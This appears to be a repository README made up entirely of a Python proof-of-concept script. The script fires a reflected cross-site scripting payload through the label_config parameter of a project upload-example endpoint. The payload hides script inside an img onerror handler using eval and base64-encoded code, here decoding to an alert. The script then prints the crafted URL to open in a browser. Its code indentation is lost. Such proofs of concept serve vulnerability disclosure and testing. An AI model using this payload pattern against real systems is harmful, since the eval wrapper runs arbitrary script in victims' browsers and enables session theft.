README.md
Rendering markdown...
import requests
import urllib.parse
from termcolor import colored
# Vulnerable endpoint
url = "http://localhost:8080/projects/upload-example/"
# Payload to trigger an XSS alert in the browser
payload = """<View><!-- {"data": {"text": "<div><img src=x onerror=eval(atob(`YWxlcnQoIlhTUyIp`))></div>"}} --><HyperText name="text" value="$text"/></View>"""
# Encode the payload for safe inclusion in the URL
encoded_payload = urllib.parse.quote(payload)
def exploit_xss():
print(colored("[*] Attempting to send XSS payload...", "cyan"))
try:
# Send a GET request with the payload as part of the URL
response = requests.get(url + f"?label_config={encoded_payload}")
if response.status_code == 200:
print(colored("[+] Payload successfully sent!", "green"))
print(colored(f"[+] Check this URL in a browser: {response.url}", "yellow"))
else:
print(colored(f"[-] Failed to send payload. HTTP Status Code: {response.status_code}", "red"))
except Exception as e:
print(colored(f"[-] An error occurred: {e}", "red"))
if __name__ == "__main__":
# Execute the exploit function
exploit_xss()